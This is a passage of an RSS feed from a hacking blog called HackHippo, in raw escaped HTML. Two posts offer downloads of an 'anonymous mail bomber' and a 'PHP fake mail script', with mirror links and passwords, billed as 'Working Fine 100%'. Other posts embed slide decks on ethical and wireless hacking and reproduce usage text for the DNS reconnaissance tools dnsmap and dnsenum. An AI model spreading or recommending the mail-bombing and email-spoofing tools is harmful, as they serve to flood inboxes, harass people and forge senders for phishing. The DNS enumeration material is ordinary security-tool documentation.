Hacking</category><category domain="http://www.blogger.com/atom/ns#">Hacking</category><category domain="http://www.blogger.com/atom/ns#">Social Engineering</category><title>HaCkHiPp0 PHP ANONYMOUS MAIL BOMBER</title><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;h3 style="text-align: center;"&gt;
&lt;span style="color: #444444; font-family: arial, sans-serif; font-size: small;"&gt;&lt;span style="line-height: 16.1200008392334px;"&gt;HaCk HiPp0 PHP ANONYMOUS MAIL BOMBER Working Fine 100%&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;div&gt;
&lt;span style="color: #444444; font-family: arial, sans-serif; font-size: small;"&gt;&lt;span style="line-height: 16.1200008392334px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizPPHvlQxK-_u0VO8-cjACbqbhVxOQER_Hf5c-IvfmCziOQAk2MePGXiRusGW4-o1OlLsImVPeLZs4pRdjsQzRZ4LsBE9gs9rcAKHKr8Dq9pVGCbJuuKQJn-Vez-mOQOHqw6htjac27Mo/s1600/bomber.JPG" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img alt="HaCk HiPp0 PHP ANONYMOUS MAIL BOMBER Working Fine 100%" border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizPPHvlQxK-_u0VO8-cjACbqbhVxOQER_Hf5c-IvfmCziOQAk2MePGXiRusGW4-o1OlLsImVPeLZs4pRdjsQzRZ4LsBE9gs9rcAKHKr8Dq9pVGCbJuuKQJn-Vez-mOQOHqw6htjac27Mo/s1600/bomber.JPG" height="167" title="HaCk HiPp0 PHP ANONYMOUS MAIL BOMBER Working Fine 100%" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="color: lime; font-size: large;"&gt;Zip Pass:hackhippo&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: lime; font-size: large;"&gt;&lt;b&gt;&lt;u&gt;&lt;br /&gt;&lt;/u&gt;&lt;/b&gt;&lt;/span&gt;
&lt;br /&gt;
&lt;table border="0" cellpadding="0" cellspacing="0"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td class="padding_topbottom5px" style="padding-bottom: 5px; padding-top: 5px;" width="35"&gt;&lt;span class="fontsize11" style="color: #5e5e5e; font-size: 11px;"&gt;&lt;a href="https://www.blogger.com/blogger.g?blogID=6760504672792288349" rel="nofollow" style="color: #0058bb; text-decoration: none;" target="_blank"&gt;&lt;img border="0" src="http://s2.softpedia-static.com/base_img/download_s_bullet.gif" height="24" width="31" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;div class="fontsize16" style="color: #5e5e5e; font-size: 16px;"&gt;
&lt;b&gt;&lt;a href="http://share.cx.com/mFzsDf" rel="nofollow" target="_blank"&gt;HackHippo Secure Download (cx.com)&lt;/a&gt;&lt;/b&gt;&amp;nbsp;&lt;span class="download_smalltext" style="color: #001f5b; font-size: 9px;"&gt;[RAR]&lt;/span&gt;&lt;br /&gt;
&lt;span class="download_smalltext" style="color: #001f5b; font-size: 9px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="padding_topbottom5px" style="padding-bottom: 5px; padding-top: 5px;" width="35"&gt;&lt;span class="fontsize11" style="color: #5e5e5e; font-size: 11px;"&gt;&lt;a href="http://www.softpedia.com/dyn-postdownload.php?p=240782&amp;amp;t=5&amp;amp;i=1" rel="nofollow" style="color: #0058bb; text-decoration: none;" target="_blank"&gt;&lt;img border="0" src="http://s2.softpedia-static.com/base_img/download_s_bullet.gif" height="24" width="31" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;div class="fontsize16" style="color: #5e5e5e; font-size: 16px;"&gt;
&lt;b&gt;&lt;a href="http://www.mediafire.com/download/6l5t8n3k92i692u/ANONYMOUS_MAIL_BOMBER.zip" rel="nofollow" target="_blank"&gt;HackHippo Secure Download (mediafire.com)&lt;/a&gt;&lt;/b&gt;&amp;nbsp;&lt;span class="download_smalltext" style="color: #001f5b; font-size: 9px;"&gt;[RAR]&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;div class="fontsize11" style="font-size: 11px;"&gt;
&lt;/div&gt;
&lt;div style="margin: 5px 0px 3px;"&gt;
&lt;img src="http://s2.softpedia-static.com/base_img/info_13.png" style="margin-bottom: -3px;" /&gt;&amp;nbsp;&lt;span class="smalltext" style="font-size: 9px;"&gt;All downloads are original and not repacked or modified in any way by us&lt;/span&gt;&lt;/div&gt;
&lt;img src="http://s2.softpedia-static.com/base_img/s_bullet.gif" style="margin-bottom: -3px;" /&gt;&amp;nbsp;&lt;span class="smalltext" style="font-size: 9px;"&gt;Secure downloads are files hosted and checked by HackHippo&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class="blogger-post-footer"&gt;http://feeds.feedburner.com/HackHippo&lt;/div&gt;</description><link>http://hackhippo.blogspot.com/2014/02/hackhipp0-php-anonymous-mail-bomber.html</link><author>noreply@blogger.com (Sahil Rai)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizPPHvlQxK-_u0VO8-cjACbqbhVxOQER_Hf5c-IvfmCziOQAk2MePGXiRusGW4-o1OlLsImVPeLZs4pRdjsQzRZ4LsBE9gs9rcAKHKr8Dq9pVGCbJuuKQJn-Vez-mOQOHqw6htjac27Mo/s72-c/bomber.JPG" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-6760504672792288349.post-3916788680595424470</guid><pubDate>Tue, 04 Feb 2014 09:07:00 +0000</pubDate><atom:updated>2014-03-28T00:48:33.172-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Blogger</category><category domain="http://www.blogger.com/atom/ns#">Download</category><category domain="http://www.blogger.com/atom/ns#">Educational</category><category domain="http://www.blogger.com/atom/ns#">Ethical Hacking</category><category domain="http://www.blogger.com/atom/ns#">Hacking</category><category domain="http://www.blogger.com/atom/ns#">Internet</category><category domain="http://www.blogger.com/atom/ns#">Social Engineering</category><title>New PHP Fake Mail Script Free Downloads</title><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;h2 style="text-align: left;"&gt;
Hack Hippo New Php Fake Mailer Script Working Fine 100%&amp;nbsp;&lt;/h2&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhszspxAxJdNCRXyytFQ9bHZ7Px15P7RukSs8T9j6BRywxZvoTftXWykXXeYs1uE2r7cuLbkmW8Zu_6y2SZOHrZRZuHkC9WFIqNK6OzyTVtG0g8YOZLrjoiK9qOe7TV2Osya9yoUc7Rnxg/s1600/New-PHP-Fake-Mail-Script-Free-Downloads-Hack-Hippo-Sahil-Rai.JPG" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhszspxAxJdNCRXyytFQ9bHZ7Px15P7RukSs8T9j6BRywxZvoTftXWykXXeYs1uE2r7cuLbkmW8Zu_6y2SZOHrZRZuHkC9WFIqNK6OzyTVtG0g8YOZLrjoiK9qOe7TV2Osya9yoUc7Rnxg/s1600/New-PHP-Fake-Mail-Script-Free-Downloads-Hack-Hippo-Sahil-Rai.JPG" height="208" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="color: lime; font-size: large;"&gt;&lt;b&gt;&lt;u&gt;Download:&lt;/u&gt;&lt;/b&gt;&lt;/span&gt;Send Mail Option Is password protected&lt;br /&gt;
&lt;div&gt;
Password is : hippo12&lt;/div&gt;
&lt;span style="color: lime; font-size: large;"&gt;&lt;b&gt;&lt;u&gt;&lt;br /&gt;&lt;/u&gt;&lt;/b&gt;&lt;/span&gt;
&lt;br /&gt;
&lt;table border="0" cellpadding="0" cellspacing="0"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td class="padding_topbottom5px" style="padding-bottom: 5px; padding-top: 5px;" width="35"&gt;&lt;span class="fontsize11" style="color: #5e5e5e; font-size: 11px;"&gt;&lt;a href="https://www.blogger.com/blogger.g?blogID=6760504672792288349" rel="nofollow" style="color: #0058bb; text-decoration: none;" target="_blank"&gt;&lt;img border="0" src="http://s2.softpedia-static.com/base_img/download_s_bullet.gif" height="24" width="31" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;div class="fontsize16" style="color: #5e5e5e; font-size: 16px;"&gt;
&lt;b&gt;&lt;a href="http://share.cx.com/KNyFtS" rel="nofollow" target="_blank"&gt;HackHippo Secure Download (cx.com)&lt;/a&gt;&lt;/b&gt;&amp;nbsp;&lt;span class="download_smalltext" style="color: #001f5b; font-size: 9px;"&gt;[RAR]&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="padding_topbottom5px" style="padding-bottom: 5px; padding-top: 5px;" width="35"&gt;&lt;span class="fontsize11" style="color: #5e5e5e; font-size: 11px;"&gt;&lt;a href="http://www.softpedia.com/dyn-postdownload.php?p=240782&amp;amp;t=5&amp;amp;i=1" rel="nofollow" style="color: #0058bb; text-decoration: none;" target="_blank"&gt;&lt;img border="0" src="http://s2.softpedia-static.com/base_img/download_s_bullet.gif" height="24" width="31" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;div class="fontsize16" style="color: #5e5e5e; font-size: 16px;"&gt;
&lt;b&gt;&lt;a href="http://www.mediafire.com/view/oo26u39t8y2fgnm/index.php" rel="nofollow" target="_blank"&gt;HackHippo Secure Download (mediafire.com)&lt;/a&gt;&lt;/b&gt;&amp;nbsp;&lt;span class="download_smalltext" style="color: #001f5b; font-size: 9px;"&gt;[RAR]&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;div class="fontsize11" style="font-size: 11px;"&gt;
&lt;/div&gt;
&lt;div style="margin: 5px 0px 3px;"&gt;
&lt;img src="http://s2.softpedia-static.com/base_img/info_13.png" style="margin-bottom: -3px;" /&gt;&amp;nbsp;&lt;span class="smalltext" style="font-size: 9px;"&gt;All downloads are original and not repacked or modified in any way by us&lt;/span&gt;&lt;/div&gt;
&lt;img src="http://s2.softpedia-static.com/base_img/s_bullet.gif" style="margin-bottom: -3px;" /&gt;&amp;nbsp;&lt;span class="smalltext" style="font-size: 9px;"&gt;Secure downloads are files hosted and checked by HackHippo&lt;/span&gt;&lt;br /&gt;
&lt;span class="smalltext" style="font-size: 9px;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span class="smalltext" style="font-size: 9px;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;br /&gt;
&lt;br /&gt;
Send Mail Option Is password protected&amp;nbsp;&lt;/div&gt;
&lt;div&gt;
Password is : hippo12
&lt;span class="smalltext" style="font-size: 9px;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span class="smalltext" style="font-size: 9px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="smalltext" style="font-size: 9px;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span class="smalltext" style="font-size: 9px;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span class="smalltext" style="font-size: 9px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class="blogger-post-footer"&gt;http://feeds.feedburner.com/HackHippo&lt;/div&gt;</description><link>http://hackhippo.blogspot.com/2014/02/new-php-fake-mail-script-free-downloads.html</link><author>noreply@blogger.com (Sahil Rai)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhszspxAxJdNCRXyytFQ9bHZ7Px15P7RukSs8T9j6BRywxZvoTftXWykXXeYs1uE2r7cuLbkmW8Zu_6y2SZOHrZRZuHkC9WFIqNK6OzyTVtG0g8YOZLrjoiK9qOe7TV2Osya9yoUc7Rnxg/s72-c/New-PHP-Fake-Mail-Script-Free-Downloads-Hack-Hippo-Sahil-Rai.JPG" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-6760504672792288349.post-7742261973429856802</guid><pubDate>Wed, 13 Nov 2013 15:53:00 +0000</pubDate><atom:updated>2013-11-13T07:58:39.267-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">CEH v8</category><category domain="http://www.blogger.com/atom/ns#">Ethical Hacking</category><category domain="http://www.blogger.com/atom/ns#">Powerpoint Slides</category><title>introduction of Information security &amp; ethical hacking ppt</title><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div style="text-align: center;"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgF-uuRwol8eh2ybS3sksvg8Wp58wt-DmKc_HkBujTglk95A5Z3YWG1_KkeSJrTBKFHEIalirT1MAa_H4I1P9ZLH-BFBrkBV5ulLBoGrSnR9Vafa-5gyMl__FhiWF-rOIkrpjNb-jxUXS0/s1600/introduction+of+Information+security+&amp;amp;+ethical+hacking+ppt.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgF-uuRwol8eh2ybS3sksvg8Wp58wt-DmKc_HkBujTglk95A5Z3YWG1_KkeSJrTBKFHEIalirT1MAa_H4I1P9ZLH-BFBrkBV5ulLBoGrSnR9Vafa-5gyMl__FhiWF-rOIkrpjNb-jxUXS0/s1600/introduction+of+Information+security+&amp;amp;+ethical+hacking+ppt.jpg" height="5" width="5" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;h3 style="margin: 3px; padding: 0px; text-align: center;"&gt;
&lt;a href="http://www.authorstream.com/Presentation/sahilrai85-1906425-information-security-ethical-hacking/" style="font: normal 18px,arial;" target="_blank"&gt;Information security &amp;amp; ethical hacking&lt;/a&gt;&lt;/h3&gt;
&lt;div style="text-align: center;"&gt;
&lt;object height="354" id="player" width="425"&gt;&lt;param name="movie" value="http://www.authorstream.com/player.swf?fb=0&amp;nb=1&amp;ap=0&amp;pl=as&amp;c=#dfdfdf&amp;p=1906425_635120822315095000" /&gt;&lt;param name="allowfullscreen" value="true" /&gt;&lt;param name="allowScriptAccess" value="always"/&gt;&lt;embed src="http://www.authorstream.com/player.swf?fb=0&amp;nb=1&amp;ap=0&amp;pl=as&amp;c=#dfdfdf&amp;p=1906425_635120822315095000" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="354"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;/div&gt;
&lt;div&gt;
&lt;div style="font-family: arial; font-size: 11px; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; text-align: center;"&gt;
More &lt;a href="http://www.authorstream.com/" target="_blank"&gt;PowerPoint presentations&lt;/a&gt; from &lt;a href="http://www.authorstream.com/sahilrai85/" target="_blank"&gt;Sahil Rai &lt;/a&gt;&lt;/div&gt;
&lt;div style="font-family: arial; font-size: 11px; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; text-align: center;"&gt;
&lt;/div&gt;
&lt;div style="font-family: arial; font-size: 11px; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; text-align: center;"&gt;
&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;span style="font-family: arial;"&gt;&lt;span style="font-size: 11px;"&gt;© HaCkHiPp0-TeaM.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;span style="font-family: arial;"&gt;&lt;span style="font-size: 11px;"&gt;R0oTx:Sahil_Rai, Manish Pathak (1337C001), p7771 (p@nku k@p0or)&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="blogger-post-footer"&gt;http://feeds.feedburner.com/HackHippo&lt;/div&gt;</description><link>http://hackhippo.blogspot.com/2013/11/introduction-of-information-security.html</link><author>noreply@blogger.com (Sahil Rai)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgF-uuRwol8eh2ybS3sksvg8Wp58wt-DmKc_HkBujTglk95A5Z3YWG1_KkeSJrTBKFHEIalirT1MAa_H4I1P9ZLH-BFBrkBV5ulLBoGrSnR9Vafa-5gyMl__FhiWF-rOIkrpjNb-jxUXS0/s72-c/introduction+of+Information+security+&amp;+ethical+hacking+ppt.jpg" width="72"/><thr:total>0</thr:total><enclosure length="152265" type="application/x-shockwave-flash" url="http://www.authorstream.com/player.swf?fb=0&amp;nb=1&amp;ap=0&amp;pl=as&amp;c=#dfdfdf&amp;p=1906425_635120822315095000"/><itunes:explicit/><itunes:subtitle>Information security &amp;amp; ethical hacking More PowerPoint presentations from Sahil Rai © HaCkHiPp0-TeaM. R0oTx:Sahil_Rai, Manish Pathak (1337C001), p7771 (p@nku k@p0or)&amp;nbsp; http://feeds.feedburner.com/HackHippo</itunes:subtitle><itunes:author>noreply@blogger.com (Sahil Rai)</itunes:author><itunes:summary>Information security &amp;amp; ethical hacking More PowerPoint presentations from Sahil Rai © HaCkHiPp0-TeaM. R0oTx:Sahil_Rai, Manish Pathak (1337C001), p7771 (p@nku k@p0or)&amp;nbsp; http://feeds.feedburner.com/HackHippo</itunes:summary><itunes:keywords>CEH v8, Ethical Hacking, Powerpoint Slides</itunes:keywords></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-6760504672792288349.post-1138004183234019418</guid><pubDate>Wed, 13 Nov 2013 12:02:00 +0000</pubDate><atom:updated>2013-11-13T04:11:00.339-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Hacking Wireless</category><title>Hacking Wireless Networks</title><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiopyg-f8p8nRC7iA_JK5f9hjeq6oMOy3sPdX2Av6W1E0rESePUT13Wd3Cdgdng81dJoKXsB-NRIKBfW82CayDEWsAHIjAq9SpkACZPh0SGuitG4em-Hg5ghyphenhyphenUyP5LNNisdx9CYN_mc0tE/s1600/Hacking-Wireless-Networks.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiopyg-f8p8nRC7iA_JK5f9hjeq6oMOy3sPdX2Av6W1E0rESePUT13Wd3Cdgdng81dJoKXsB-NRIKBfW82CayDEWsAHIjAq9SpkACZPh0SGuitG4em-Hg5ghyphenhyphenUyP5LNNisdx9CYN_mc0tE/s1600/Hacking-Wireless-Networks.JPG" height="20" width="20" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;h3 style="margin: 3px; padding: 0px; text-align: center;"&gt;
&lt;a href="http://www.authorstream.com/Presentation/sahilrai85-1981900-hacking-wireless-networks/" style="font: normal 18px,arial;" target="_blank"&gt;Hacking Wireless Networks&lt;/a&gt;&lt;/h3&gt;
&lt;div style="text-align: center;"&gt;
&lt;object height="354" id="player" width="425"&gt;&lt;param name="movie" value="http://www.authorstream.com/player.swf?fb=0&amp;nb=1&amp;ap=0&amp;pl=as&amp;c=#dfdfdf&amp;p=1981900_635192933854313750" /&gt;&lt;param name="allowfullscreen" value="true" /&gt;&lt;param name="allowScriptAccess" value="always"/&gt;&lt;embed src="http://www.authorstream.com/player.swf?fb=0&amp;nb=1&amp;ap=0&amp;pl=as&amp;c=#dfdfdf&amp;p=1981900_635192933854313750" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="550" height="374"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;/div&gt;
&lt;div style="font-family: arial; font-size-adjust: none; font-size: 11px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;"&gt;
&lt;div style="text-align: center;"&gt;
More &lt;a href="http://www.authorstream.com/" target="_blank"&gt;PowerPoint presentations&lt;/a&gt; from &lt;a href="http://www.authorstream.com/sahilrai85/" target="_blank"&gt;Sahil Rai &lt;/a&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="blogger-post-footer"&gt;http://feeds.feedburner.com/HackHippo&lt;/div&gt;</description><link>http://hackhippo.blogspot.com/2013/11/hacking-wireless-networks.html</link><author>noreply@blogger.com (Sahil Rai)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiopyg-f8p8nRC7iA_JK5f9hjeq6oMOy3sPdX2Av6W1E0rESePUT13Wd3Cdgdng81dJoKXsB-NRIKBfW82CayDEWsAHIjAq9SpkACZPh0SGuitG4em-Hg5ghyphenhyphenUyP5LNNisdx9CYN_mc0tE/s72-c/Hacking-Wireless-Networks.JPG" width="72"/><thr:total>0</thr:total><enclosure length="152265" type="application/x-shockwave-flash" url="http://www.authorstream.com/player.swf?fb=0&amp;nb=1&amp;ap=0&amp;pl=as&amp;c=#dfdfdf&amp;p=1981900_635192933854313750"/><itunes:explicit/><itunes:subtitle>Hacking Wireless Networks More PowerPoint presentations from Sahil Rai http://feeds.feedburner.com/HackHippo</itunes:subtitle><itunes:author>noreply@blogger.com (Sahil Rai)</itunes:author><itunes:summary>Hacking Wireless Networks More PowerPoint presentations from Sahil Rai http://feeds.feedburner.com/HackHippo</itunes:summary><itunes:keywords>Hacking Wireless</itunes:keywords></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-6760504672792288349.post-2917804800968212594</guid><pubDate>Wed, 06 Nov 2013 11:11:00 +0000</pubDate><atom:updated>2013-11-11T08:45:11.955-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Back Track</category><category domain="http://www.blogger.com/atom/ns#">CEH v8</category><category domain="http://www.blogger.com/atom/ns#">Educational</category><category domain="http://www.blogger.com/atom/ns#">Ethical Hacking</category><category domain="http://www.blogger.com/atom/ns#">Footprinting</category><category domain="http://www.blogger.com/atom/ns#">Hacking</category><category domain="http://www.blogger.com/atom/ns#">Scanning</category><title>DNS Network Mapper Backtrack</title><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
dnsmap 0.30 - DNS Network Mapper by pagvac (gnucitizen.org)&lt;br /&gt;
&lt;br /&gt;
usage: dnsmap &amp;lt;target-domain&amp;gt; [options]&lt;br /&gt;
options:&lt;br /&gt;
-w &amp;lt;wordlist-file&amp;gt;&lt;br /&gt;
-r &amp;lt;regular-results-file&amp;gt;&lt;br /&gt;
-c &amp;lt;csv-results-file&amp;gt;&lt;br /&gt;
-d &amp;lt;delay-millisecs&amp;gt;&lt;br /&gt;
-i &amp;lt;ips-to-ignore&amp;gt; (useful if you're obtaining false positives)&lt;br /&gt;
&lt;br /&gt;
e.g.:&lt;br /&gt;
dnsmap target-domain.foo&lt;br /&gt;
dnsmap target-domain.foo -w yourwordlist.txt -r /tmp/domainbf_results.txt&lt;br /&gt;
dnsmap target-fomain.foo -r /tmp/ -d 3000&lt;br /&gt;
dnsmap target-fomain.foo -r ./domainbf_results.txt&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_LDHQvcg19iWtIh7UqybVW8oJZrGLe-7CPhzMMCSck3ahSxg_ScNc0W_sBwccckUlXWOtlCzhJ8OCyXGqxCU6IV6p2v3XlY4_cnazVYHx5I6S_hfgWgXY5QvFqc-TRjJD7BQUaVzNysE/s1600/dnsmap.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_LDHQvcg19iWtIh7UqybVW8oJZrGLe-7CPhzMMCSck3ahSxg_ScNc0W_sBwccckUlXWOtlCzhJ8OCyXGqxCU6IV6p2v3XlY4_cnazVYHx5I6S_hfgWgXY5QvFqc-TRjJD7BQUaVzNysE/s1600/dnsmap.JPG" height="150" width="520" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIBuyRpe7EM3oB1ZTtt0slbYZk2jkzSSn8HxbYPI-81YhUDEj6NX0FGmzq-Odb6GauX5PPErMhvUKSirYUIUMUPwgGduQqowBCictmeyJ_SjCCRin-iI6InHqGq59KzWVKheDy3JLNa8k/s1600/dnsmap2.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIBuyRpe7EM3oB1ZTtt0slbYZk2jkzSSn8HxbYPI-81YhUDEj6NX0FGmzq-Odb6GauX5PPErMhvUKSirYUIUMUPwgGduQqowBCictmeyJ_SjCCRin-iI6InHqGq59KzWVKheDy3JLNa8k/s1600/dnsmap2.JPG" height="300" width="520" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div style="text-align: center;"&gt;
© HaCkHiPp0-TeaM.&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
R0oTx:Sahil_Rai,&amp;nbsp;Manish Pathak (1337C001),&amp;nbsp;p7771 (p@nku k@p0or)&amp;nbsp;&lt;/div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="blogger-post-footer"&gt;http://feeds.feedburner.com/HackHippo&lt;/div&gt;</description><link>http://hackhippo.blogspot.com/2013/11/dns-network-mapper-backtrack.html</link><author>noreply@blogger.com (hacker inside)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_LDHQvcg19iWtIh7UqybVW8oJZrGLe-7CPhzMMCSck3ahSxg_ScNc0W_sBwccckUlXWOtlCzhJ8OCyXGqxCU6IV6p2v3XlY4_cnazVYHx5I6S_hfgWgXY5QvFqc-TRjJD7BQUaVzNysE/s72-c/dnsmap.JPG" width="72"/><thr:total>1</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-6760504672792288349.post-7896119065992716655</guid><pubDate>Wed, 06 Nov 2013 10:48:00 +0000</pubDate><atom:updated>2013-11-11T08:45:37.816-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">CEH v8</category><category domain="http://www.blogger.com/atom/ns#">Educational</category><category domain="http://www.blogger.com/atom/ns#">Footprinting</category><category domain="http://www.blogger.com/atom/ns#">Scanning</category><title>DNS Information Gathering Tool</title><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
DNS Information Gathering Tool&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
1) Get the host’s addresse (A record).&lt;br /&gt;
2) Get the namservers (threaded).&lt;br /&gt;
3) Get the MX record (threaded).&lt;br /&gt;
4) Perform axfr queries on nameservers and get BIND versions(threaded).&lt;br /&gt;
5) Get extra names and subdomains via Google scraping (Google query = “allinurl: -www site:domain”).&lt;br /&gt;
6) Brute force subdomains from file, can also perform recursion on subdomain that have NS records (all threaded).&lt;br /&gt;
7) Calculate C class domain network ranges and perform whois queries on them (threaded).&lt;br /&gt;
8) Perform reverse lookups on net ranges ( C class or/and whois net ranges) (threaded).&lt;br /&gt;
9) Write to domain_ips.txt file ip-blocks&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEheV0KridWzFiFOkw2jGtUEZ3xJxsbuWaYCkYd0pzfGp1leFTyutdbcLD532bTmEcEI9ElcPNqYbEbwbufcIrUhSZC3-JjsqtItRwXlnD2HeUCerfSp2PYpgnwKwnSYYZqm7yqO5c6Xkp4/s1600/dnsenum.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEheV0KridWzFiFOkw2jGtUEZ3xJxsbuWaYCkYd0pzfGp1leFTyutdbcLD532bTmEcEI9ElcPNqYbEbwbufcIrUhSZC3-JjsqtItRwXlnD2HeUCerfSp2PYpgnwKwnSYYZqm7yqO5c6Xkp4/s1600/dnsenum.JPG" height="152" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
